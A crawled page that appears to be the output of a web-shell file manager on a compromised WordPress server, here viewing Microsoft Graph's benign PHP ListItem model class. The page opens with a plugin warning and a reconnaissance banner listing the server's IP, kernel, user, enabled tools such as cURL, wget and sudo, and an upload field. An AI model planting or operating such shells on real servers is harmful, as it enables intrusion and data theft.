Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /proc/thread-self/cwd/vendor/microsoft/microsoft-graph/src/Model/ |
Upload File : |
<?php
/**
* Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information.
*
* ListItem File
* PHP version 7
*
* @category Library
* @package Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license https://opensource.org/licenses/MIT MIT License
* @link https://graph.microsoft.com
*/
namespace Microsoft\Graph\Model;
/**
* ListItem class
*
* @category Model
* @package Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license https://opensource.org/licenses/MIT MIT License
* @link https://graph.microsoft.com
*/
class ListItem extends BaseItem
{
/**
* Gets the contentType
* The content type of this list item
*
* @return ContentTypeInfo|null The contentType
*/
public function getContentType()
{
if (array_key_exists("contentType", $this->_propDict)) {
if (is_a($this->_propDict["contentType"], "\Microsoft\Graph\Model\ContentTypeInfo") || is_null($this->_propDict["contentType"])) {
return $this->_propDict["contentType"];
} else {
$this->_propDict["contentType"] = new ContentTypeInfo($this->_propDict["contentType"]);
return $this->_propDict["contentType"];
}
}
return null;
}
/**
* Sets the contentType
* The content type of this list item
*
* @param ContentTypeInfo $val The contentType
*
* @return ListItem
*/
public function setContentType($val)
{
$this->_propDict["contentType"] = $val;
return $this;
}
/**
* Gets the sharepointIds
* Returns identifiers useful for SharePoint REST compatibility. Read-only.
*
* @return SharepointIds|null The sharepointIds
*/
public function getSharepointIds()
{
if (array_key_exists("sharepointIds", $this->_propDict)) {
if (is_a($this->_propDict["sharepointIds"], "\Microsoft\Graph\Model\SharepointIds") || is_null($this->_propDict["sharepointIds"])) {
return $this->_propDict["sharepointIds"];
} else {
$this->_propDict["sharepointIds"] = new SharepointIds($this->_propDict["sharepointIds"]);
return $this->_propDict["sharepointIds"];
}
}
return null;
}
/**
* Sets the sharepointIds
* Returns identifiers useful for SharePoint REST compatibility. Read-only.
*
* @param SharepointIds $val The sharepointIds
*
* @return ListItem
*/
public function setSharepointIds($val)
{
$this->_propDict["sharepointIds"] = $val;
return $this;
}
/**
* Gets the analytics
* Analytics about the view activities that took place on this item.
*
* @return ItemAnalytics|null The analytics
*/
public function getAnalytics()
{
if (array_key_exists("analytics", $this->_propDict)) {
if (is_a($this->_propDict["analytics"], "\Microsoft\Graph\Model\ItemAnalytics") || is_null($this->_propDict["analytics"])) {
return $this->_propDict["analytics"];
} else {
$this->_propDict["analytics"] = new ItemAnalytics($this->_propDict["analytics"]);
return $this->_propDict["analytics"];
}
}
return null;
}
/**
* Sets the analytics
* Analytics about the view activities that took place on this item.
*
* @param ItemAnalytics $val The analytics
*
* @return ListItem
*/
public function setAnalytics($val)
{
$this->_propDict["analytics"] = $val;
return $this;
}
/**
* Gets the documentSetVersions
* Version information for a document set version created by a user.
*
* @return array|null The documentSetVersions
*/
public function getDocumentSetVersions()
{
if (array_key_exists("documentSetVersions", $this->_propDict)) {
return $this->_propDict["documentSetVersions"];
} else {
return null;
}
}
/**
* Sets the documentSetVersions
* Version information for a document set version created by a user.
*
* @param DocumentSetVersion[] $val The documentSetVersions
*
* @return ListItem
*/
public function setDocumentSetVersions($val)
{
$this->_propDict["documentSetVersions"] = $val;
return $this;
}
/**
* Gets the driveItem
* For document libraries, the driveItem relationship exposes the listItem as a [driveItem][]
*
* @return DriveItem|null The driveItem
*/
public function getDriveItem()
{
if (array_key_exists("driveItem", $this->_propDict)) {
if (is_a($this->_propDict["driveItem"], "\Microsoft\Graph\Model\DriveItem") || is_null($this->_propDict["driveItem"])) {
return $this->_propDict["driveItem"];
} else {
$this->_propDict["driveItem"] = new DriveItem($this->_propDict["driveItem"]);
return $this->_propDict["driveItem"];
}
}
return null;
}
/**
* Sets the driveItem
* For document libraries, the driveItem relationship exposes the listItem as a [driveItem][]
*
* @param DriveItem $val The driveItem
*
* @return ListItem
*/
public function setDriveItem($val)
{
$this->_propDict["driveItem"] = $val;
return $this;
}
/**
* Gets the fields
* The values of the columns set on this list item.
*
* @return FieldValueSet|null The fields
*/
public function getFields()
{
if (array_key_exists("fields", $this->_propDict)) {
if (is_a($this->_propDict["fields"], "\Microsoft\Graph\Model\FieldValueSet") || is_null($this->_propDict["fields"])) {
return $this->_propDict["fields"];
} else {
$this->_propDict["fields"] = new FieldValueSet($this->_propDict["fields"]);
return $this->_propDict["fields"];
}
}
return null;
}
/**
* Sets the fields
* The values of the columns set on this list item.
*
* @param FieldValueSet $val The fields
*
* @return ListItem
*/
public function setFields($val)
{
$this->_propDict["fields"] = $val;
return $this;
}
/**
* Gets the versions
* The list of previous versions of the list item.
*
* @return array|null The versions
*/
public function getVersions()
{
if (array_key_exists("versions", $this->_propDict)) {
return $this->_propDict["versions"];
} else {
return null;
}
}
/**
* Sets the versions
* The list of previous versions of the list item.
*
* @param ListItemVersion[] $val The versions
*
* @return ListItem
*/
public function setVersions($val)
{
$this->_propDict["versions"] = $val;
return $this;
}
}